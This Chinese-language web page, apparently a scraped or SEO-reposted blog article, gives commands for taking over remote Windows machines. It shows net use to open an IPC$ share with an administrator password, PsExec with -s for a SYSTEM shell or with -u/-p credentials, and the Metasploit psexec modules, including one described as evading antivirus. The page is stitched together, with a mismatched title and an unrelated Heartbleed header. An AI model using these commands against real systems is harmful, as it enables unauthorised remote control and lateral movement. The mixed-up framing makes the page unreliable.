首页 » SEO优化 » apachephpexec权限技巧_运用PsExec获得windows远程控制权限

apachephpexec权限技巧_运用PsExec获得windows远程控制权限

访客 2024-12-16 0

扫一扫用手机浏览

文章目录 [+]

【网络安全】Heartbleed漏洞剖析 作者 ailx10

1、PsTools工具包中的PsExec

apachephpexec权限技巧_运用PsExec获得windows远程控制权限

pstools微软下载地址验证环境是 windows server2012 --> win7

第一步:建立IPC$管道

apachephpexec权限技巧_运用PsExec获得windows远程控制权限
(图片来自网络侵删)

net use \\192.168.160.135\ipc$ "W2ngluoanquan" /user:HACKBIJI\Administrator

第二步:通过PsExec.exe得到远程系统的掌握权

-accepteula 确保不会弹出确认对话框-s 获取系统权限(System)

.\PsExec.exe -accepteula \\192.168.160.135 -s cmd.exe

如果不添加-s参数,那么得到的是管理员权限

如果没有提前建立好IPC$,PsExec也可以通过指定账号和密码的办法,进行远程连接。

.\PsExec.exe \\192.168.160.135 -u HACKBIJI\ailx00 -p WoShi@Ailx10 cmd.exe

2、metasploit中的psexec模块

metasploit是著名的漏洞检测工具框架,整合了漏洞扫描、漏洞利用、后渗透安全检测等

kali-->win7 域用户测试失落败(不支持win7)

模块(免杀):use exploit/windows/smb/psexec_pshkali-->windows server 2012 域用户测试成功(喜悦)

模块:use exploit/windows/smb/psexeckali-->windows server 2012 域用户测试成功(喜悦)

本篇完~

标签:

相关文章